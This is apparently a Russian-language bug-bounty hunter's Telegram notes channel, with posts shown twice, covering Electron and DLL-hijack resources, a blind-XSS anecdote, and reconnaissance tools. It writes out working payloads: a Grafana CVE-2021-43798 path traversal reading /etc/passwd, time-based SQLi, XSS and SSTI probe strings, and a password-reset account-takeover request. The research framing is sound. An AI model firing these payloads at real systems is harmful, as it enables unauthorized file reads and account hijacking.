Создал для себя канал чтобы складировать различные штуки, связанные с подготовкой к различным сертификациям и просто выражать свои мысли о той или иной новости из мира. Вероятно, будут какие-нибудь хэштеги для простого поиска, но кто знает. Возможно, канал заброшу через неделю-две.
❤1
Упс) Забросил на следующий день
Материал по уязвимостям в Electron приложениях
https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps
https://blog.yeswehack.com/yeswerhackers/exploitation/pentesting-electron-applications/
#Уязвимости #Electron
Материал по уязвимостям в Electron приложениях
https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps
https://blog.yeswehack.com/yeswerhackers/exploitation/pentesting-electron-applications/
#Уязвимости #Electron
💩1
Различные векторы атаки EXE/DLL hijacking.
Есть смысл репортить только если программа запускает от администратора.
https://offsec.almond.consulting/intro-to-file-operation-abuse-on-Windows.html
#Уязвимости #Hijack
Есть смысл репортить только если программа запускает от администратора.
https://offsec.almond.consulting/intro-to-file-operation-abuse-on-Windows.html
#Уязвимости #Hijack
Так как это канал с моими заметками для меня же, то просто хочу оставить тут свои пейлоады, чтобы было проще искать их
EXE - https://github.com/ZemlyakovDmitry/EXE-Planting-MessageBox
DLL - https://github.com/ZemlyakovDmitry/DLL-Hijack-Calculator
#Уязвимости #Hijack #SelfMade
EXE - https://github.com/ZemlyakovDmitry/EXE-Planting-MessageBox
DLL - https://github.com/ZemlyakovDmitry/DLL-Hijack-Calculator
#Уязвимости #Hijack #SelfMade
🔥1
Увидел в январе-феврале пост в одном из телеграм каналов про Blind XSS в живой природе.
Сейчас стали писать различные боты, при чём довольно активно раз в пару дней точно. Было интересно сколько аккаунтов у человека в ферме, и вообще откуда взяли мой профиль.
Закинул в ответ сообщение с самым обычным noscript src, почти сразу же на почту приходит заветное письмо "[XSSHunter] XSS Payload Fired"...
Увы, не увидел откуда этот чертила взял мой аккаунт(
В поддержке на abuse репорт ответили только "Благодарим за вашу гражданскую позицию". Видимо, они сами понимают кто пользуется их софтом и только рады этому.
Идут месяца, а разработчики так и не фиксят баги...
#Уязвимости #wild
Сейчас стали писать различные боты, при чём довольно активно раз в пару дней точно. Было интересно сколько аккаунтов у человека в ферме, и вообще откуда взяли мой профиль.
Закинул в ответ сообщение с самым обычным noscript src, почти сразу же на почту приходит заветное письмо "[XSSHunter] XSS Payload Fired"...
Увы, не увидел откуда этот чертила взял мой аккаунт(
В поддержке на abuse репорт ответили только "Благодарим за вашу гражданскую позицию". Видимо, они сами понимают кто пользуется их софтом и только рады этому.
Идут месяца, а разработчики так и не фиксят баги...
#Уязвимости #wild
Оказывается, расширение встроенного браузера Burp Suite научилось в Prototype Pollution.
Звучит интересно, надо опробовать в деле, может быть это действительно годная фича.
https://portswigger.net/blog/finding-client-side-prototype-pollution-with-dom-invader
#Уязвимости #Web #BurpSuite
Звучит интересно, надо опробовать в деле, может быть это действительно годная фича.
https://portswigger.net/blog/finding-client-side-prototype-pollution-with-dom-invader
#Уязвимости #Web #BurpSuite
PortSwigger Blog
Finding client-side prototype pollution with DOM Invader
Last year we made it significantly easier to find DOM XSS, when we introduced a brand new tool called DOM Invader. This year, we've improved DOM Invader to make finding CSPP (client-side prototype pol
Немного "устаревшая" уязвимость Grafana от 8.0.0 до 8.3.0 (включительно), но иногда попадается.
Grafana directory travesal (CVE-2021-43798).
Нагрузку можно найти везде, однако, если "жертва" использует NGINX, нам будет выдаваться 400 ошибка.
Вот как это решается: [host]/public/plugins/welcome/#/../../../../../../../../../etc/passwd
#Уязвимости #Web #CVE #selfmade
Grafana directory travesal (CVE-2021-43798).
Нагрузку можно найти везде, однако, если "жертва" использует NGINX, нам будет выдаваться 400 ошибка.
Вот как это решается: [host]/public/plugins/welcome/#/../../../../../../../../../etc/passwd
#Уязвимости #Web #CVE #selfmade
👍1
Довольно интересная история со мной приключилась недавно в ходе багхантинга.
Как обычно хантил программы. В ходе поиска среди кучи поддоменов, куда доступ был запрещён, наткнулся на доступный сабдомен, на котором торчала уязвимая Jira.
Версия была далеко не самой актуальной, посмотрел на наличие уязвимостей - есть уязвимости с публичными эксплойтами.
Зарепортил через форму, ответ пришёл через пару часов, но.....
Они не собирались патчить её, т.к. они переезжали с джиры.
Казалось бы, что платить они не будут, но.... в следующем абзаце они сообщили, что баг-трекер не должен был быть доступен из вне. Они выплатили баунти (которое, правда, я вывести не смогу), чему я оказался рад.
Итог прост: нужно проверять правила доступа, и, если что-то торчит, хотя не должно, стоит сообщить*.
* Но так не стоит делать всегда, возможно, это будет N/A или Informative. А также стоит проверять что программа классифицирует как Out-of-scope.
#истории #bugbounty
Как обычно хантил программы. В ходе поиска среди кучи поддоменов, куда доступ был запрещён, наткнулся на доступный сабдомен, на котором торчала уязвимая Jira.
Версия была далеко не самой актуальной, посмотрел на наличие уязвимостей - есть уязвимости с публичными эксплойтами.
Зарепортил через форму, ответ пришёл через пару часов, но.....
Они не собирались патчить её, т.к. они переезжали с джиры.
Казалось бы, что платить они не будут, но.... в следующем абзаце они сообщили, что баг-трекер не должен был быть доступен из вне. Они выплатили баунти (которое, правда, я вывести не смогу), чему я оказался рад.
Итог прост: нужно проверять правила доступа, и, если что-то торчит, хотя не должно, стоит сообщить*.
* Но так не стоит делать всегда, возможно, это будет N/A или Informative. А также стоит проверять что программа классифицирует как Out-of-scope.
#истории #bugbounty
👍1
@ptswarm пошерили читшит с хоткеями для Burp Suite.
Чтобы не потерять, сохраню для себя тут
#BurpSuite
Чтобы не потерять, сохраню для себя тут
#BurpSuite
Начну делиться тулзами, которые использую для Recon'а:
https://github.com/six2dez/reconftw
Инструмент, который сочетает в себе множество других, используемых для поиска сабдоменов и сканированния на уязвимости.
Нуждается в API ключах (Shodan, WhoisXML и других).
Большинство можно получить бесплатно.
#Уязвимости #Recon #Web #Tools
https://github.com/six2dez/reconftw
Инструмент, который сочетает в себе множество других, используемых для поиска сабдоменов и сканированния на уязвимости.
Нуждается в API ключах (Shodan, WhoisXML и других).
Большинство можно получить бесплатно.
#Уязвимости #Recon #Web #Tools
GitHub
GitHub - six2dez/reconftw: reconFTW is a tool designed to perform automated recon on a target domain by running the best set of…
reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities - six2dez/reconftw
Нагрузки для XSS и SQLi, которые использую при исследовании:
SQLi (time sleep) - 'XOR(if(now()=sysdate(),sleep(5*5),0))OR'
XSS - '),alert()//"><img src=x onerror=alert()>
SSTI - {{7 * 7}} (obviously, right?)
#Уязвимости #Web #BugBounty
SQLi (time sleep) - 'XOR(if(now()=sysdate(),sleep(5*5),0))OR'
XSS - '),alert()//"><img src=x onerror=alert()>
SSTI - {{7 * 7}} (obviously, right?)
#Уязвимости #Web #BugBounty
Чаще всего, чтобы сбросить пароль, нужно отправить одноразовую ссылку для смены пароля на почту, что может пойти не так, вроде бы безопасная реализация?
И да, и нет. Недавно обнаружил багу, позволяющую получить ссылку любого пользовался, воспользовавшисьсодой массивом.
Для получения ссылки было необходимо указать почты в запросе массивом. Т.е. первая почта была "жертвы", а вторая - наша. Примерно так выглядел запрос на сервер:
{
"email":
[
"victim@example.com",
"attacker@example.com"
],
"captcha_response": "много ненужных букаф"
}
После отправки запроса на почты одна и та же ссылка приходила на обе почты, что позволяло совершить Account Takeover.
Такое случается крайне редко, но никогда не стоит исключать подобные кейсы.
#Уязвимости #Web #BugBounty
И да, и нет. Недавно обнаружил багу, позволяющую получить ссылку любого пользовался, воспользовавшись
Для получения ссылки было необходимо указать почты в запросе массивом. Т.е. первая почта была "жертвы", а вторая - наша. Примерно так выглядел запрос на сервер:
{
"email":
[
"victim@example.com",
"attacker@example.com"
],
"captcha_response": "много ненужных букаф"
}
После отправки запроса на почты одна и та же ссылка приходила на обе почты, что позволяло совершить Account Takeover.
Такое случается крайне редко, но никогда не стоит исключать подобные кейсы.
#Уязвимости #Web #BugBounty
👍6💩2❤🔥1🥰1🌚1
Человек, поставивший 💩, Вы этим что хотели сказать? Просто интересно.
___
А вообще поправил ошибку в посте выше, спасибо. Где-то массивы упоминались листом, оттуда и запомнил.
Ну и хотел бы напомнить, что канал ведёт скрипткидди, который не имеет профильного образования. Тут могут быть факапы. Пишу о том, что может быть интересным мне. Ожидать мегакрутых постов, imo, не стоит. Просто заметки от себя для себя же.
___
А вообще поправил ошибку в посте выше, спасибо. Где-то массивы упоминались листом, оттуда и запомнил.
Ну и хотел бы напомнить, что канал ведёт скрипткидди, который не имеет профильного образования. Тут могут быть факапы. Пишу о том, что может быть интересным мне. Ожидать мегакрутых постов, imo, не стоит. Просто заметки от себя для себя же.
💩10👍2🌭1
Написал небольшой скрипт для поиска токенов, параметров, ссылок и различных "похожих на токен" буков в коде VK Mini Apps.
Зачем - не знаю. Возможно просто ради опыта.
Как всегда shitcoded + много false positives, но зато сам + специализированное решение для VK Mini Apps.
Парочке подписчикам будет интересно (да-да, привет Эльчин и Влад).
https://github.com/ZemlyakovDmitry/VK-Miniapp-Scanner
#selfmade
Зачем - не знаю. Возможно просто ради опыта.
Как всегда shitcoded + много false positives, но зато сам + специализированное решение для VK Mini Apps.
Парочке подписчикам будет интересно (да-да, привет Эльчин и Влад).
https://github.com/ZemlyakovDmitry/VK-Miniapp-Scanner
#selfmade
👍2🥰2
